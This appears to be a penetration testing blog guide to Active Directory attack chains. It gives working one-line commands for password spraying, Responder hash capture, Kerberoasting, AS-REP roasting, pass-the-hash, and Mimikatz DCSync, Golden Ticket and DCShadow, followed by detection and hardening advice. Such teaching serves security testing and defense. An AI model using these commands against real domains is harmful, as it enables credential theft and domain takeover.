Active Directory Attack Chains: Small Guide to Infrastructure Penetration Testing

Active Directory (AD) remains the backbone of enterprise networks, making it a critical target for both attackers and security professionals. In this comprehensive guide, we’ll explore sophisticated attack chains that can compromise Active Directory environments, along with detection and prevention strategies.

Understanding Active Directory Attack Surface

Before diving into attack chains, it’s crucial to understand the Active Directory attack surface. Active Directory is a hierarchical structure that manages network resources, user authentication, and access controls. Its complexity often leads to various security vulnerabilities that attackers can exploit.

Common Entry Points

Active Directory environments typically expose multiple entry points that attackers can leverage:

Network Service Exposure: Services like LDAP, Kerberos, and SMB are essential for AD operations but can be exploited if not properly secured.
Misconfigurations: Default settings, weak GPOs, and improper access controls often create security gaps.
Legacy Protocols: Older authentication protocols like NTLM can be exploited through various attack techniques.

Initial Access Techniques

Password Spraying

Password spraying remains one of the most effective initial access techniques. Unlike brute force attacks, password spraying uses a few common passwords against many accounts to avoid account lockouts.

Example Attack:

  # Using PowerShell Empire for password spraying
Invoke-DomainPasswordSpray -Password "Spring2023!" -UserList users.txt

LLMNR/NBT-NS Poisoning

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) poisoning can be used to capture NetNTLM hashes:

  # Using Responder to capture hashes
sudo responder -I eth0 -wrfv

Privilege Escalation Paths

Kerberoasting

Kerberoasting targets service accounts with SPNs to obtain their TGS tickets, which can be cracked offline:

  # Using PowerView for Kerberoasting
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat

AS-REP Roasting

This technique targets users with “Do not require Kerberos preauthentication” enabled:

  # Using Rubeus for AS-REP Roasting
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

Lateral Movement Techniques

Pass-the-Hash

Once you’ve obtained NTLM hashes, you can use them for lateral movement without knowing the actual password:

  # Using CrackMapExec for Pass-the-Hash
crackmapexec smb 192.168.1.0/24 -u administrator -H "<NTLM hash>"

Token Impersonation

Leveraging Windows tokens for privilege escalation and lateral movement:

  # Using Mimikatz for token impersonation
privilege::debug
token::elevate /user:DOMAIN\Administrator

Domain Dominance

DCSync Attack

Once sufficient privileges are obtained, DCSync can be used to retrieve password hashes for any domain user:

  # Using Mimikatz for DCSync
lsadump::dcsync /domain:contoso.local /user:Administrator

Golden Ticket Attack

Creating a Golden Ticket provides persistent domain admin access:

  # Using Mimikatz to create Golden Ticket
kerberos::golden /domain:contoso.local /sid:S-1-5-21-... /krbtgt:<hash> /user:fakeadmin

Detection and Prevention Strategies

Event Log Monitoring

Implement comprehensive logging and monitoring:

Enable Advanced Audit Policy Configuration
Monitor for suspicious authentication patterns
Track privileged group membership changes

Network Segmentation

Implement proper network segmentation:

Separate different security tiers
Restrict lateral movement paths
Implement PAW (Privileged Access Workstation) solutions

Security Hardening

Implement these critical security measures:

Regular password policy enforcement
Disable legacy protocols where possible
Implement LAPS (Local Administrator Password Solution)
Enable PAM (Privileged Access Management)

Advanced Persistence Techniques

DCShadow

DCShadow allows attackers to create a rogue domain controller:

  # Using Mimikatz for DCShadow
lsadump::dcshadow /object:victim /attribute:userAccountControl /value:0x200

Conclusion

Active Directory attack chains are complex but follow logical progression paths. Understanding these attack chains is crucial for both offensive security testing and defensive measures. Regular security assessments, proper monitoring, and implementing defense-in-depth strategies are essential for protecting Active Directory environments.

Remember that these techniques should only be used in authorized penetration testing engagements with proper documentation and approval.

Additional Resources

Microsoft Security Best Practices for Active Directory
MITRE ATT&CK Framework - Active Directory Tactics
Active Directory Security Blog
PowerShell Empire Documentation
Impacket Tools Documentation

Edit this page

Last updated 03 Nov 2024, 18:05 +0530 . history

Advanced Guide to Shellcode Development: From Basics to Custom Exploit Creation

Active Directory Attack Chains: Small Guide to Infrastructure Penetration Testing

Understanding Active Directory Attack Surface link

Common Entry Points link

Initial Access Techniques link

Password Spraying link

LLMNR/NBT-NS Poisoning link

Privilege Escalation Paths link

Kerberoasting link

AS-REP Roasting link

Lateral Movement Techniques link

Pass-the-Hash link

Token Impersonation link

Domain Dominance link

DCSync Attack link

Golden Ticket Attack link

Detection and Prevention Strategies link

Event Log Monitoring link

Network Segmentation link

Security Hardening link

Advanced Persistence Techniques link

DCShadow link

Conclusion link

Additional Resources link